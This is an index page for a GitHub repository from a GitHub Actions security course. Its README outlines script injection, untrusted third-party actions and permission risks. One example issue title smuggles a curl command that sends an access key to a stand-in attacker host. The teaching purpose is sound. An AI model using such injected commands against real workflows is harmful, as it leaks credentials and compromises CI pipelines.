Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/carolinasfreitas/gha-security

Repositório para seção de Segurança do curso 'GitHub Actions - The Complete Guide'
https://github.com/carolinasfreitas/gha-security

Last synced: about 15 hours ago
JSON representation

Repositório para seção de Segurança do curso 'GitHub Actions - The Complete Guide'

Host: GitHub
URL: https://github.com/carolinasfreitas/gha-security
Owner: CarolinaSFreitas
Created: 2024-08-27T20:32:56.000Z (3 months ago)
Default Branch: main
Last Pushed: 2024-08-27T21:00:39.000Z (3 months ago)
Last Synced: 2024-08-28T22:26:55.428Z (3 months ago)
Size: 813 KB
Stars: 0
Watchers: 1
Forks: 0
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

README

## Security Concerns in the Context of GitHub Actions

1. Script Injections - a value, set outside a workflow, is used in a workflow; example: issue title used in a workflow shell command; workflow / command behavior could be changed
2. Malicious third-party actions - actions can perform any logic, including potentially malicious logic; example: a third-party action that reads and exports your secrets; only use trusted actions and inspect code of unknown / untrusted authors
3. Permission issues - consider avoiding overly permissive permissions; example: only allow checking out code (“read-only”); github actions supports fine-grained permissions control

### Simple examples of injectin
Opening issues with titles like
- ``"a"; curl http://my-bad-site.com?abc=$MINHA_ACCESS_KEY_ID"``

### Docs
https://docs.github.com/en/actions/security-for-github-actions/security-hardening-your-deployments/about-security-hardening-with-openid-connect
https://docs.github.com/en/actions/security-for-github-actions/security-hardening-your-deployments/about-security-hardening-with-openid-connect